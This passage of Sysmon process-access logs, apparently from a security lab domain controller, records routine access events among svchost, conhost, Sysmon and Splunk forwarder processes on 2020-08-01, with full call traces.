08:00:43.365","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6068,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:43.365\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:43.365","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6069,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:43.365\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:43.365","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6070,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:43.365\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:43.365","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6071,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:43.365\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:43.365","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6072,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:43.365\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:43.365","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6073,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:43.365\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:43.365","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6074,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:43.365\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-212B-5F25-0000-0010EC5F0900}\r\nTargetProcessId: 4956\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:43.365","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-212B-5F25-0000-0010EC5F0900}","TargetProcessId":"4956","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:00:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6075,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:00:43.490\r\nSourceProcessGUID: {41C8662E-212B-5F25-0000-0010EC5F0900}\r\nSourceProcessId: 4956\r\nSourceThreadId: 3960\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:00:43.490","SourceProcessGUID":"{41C8662E-212B-5F25-0000-0010EC5F0900}","SourceProcessId":"4956","SourceThreadId":"3960","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:00:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
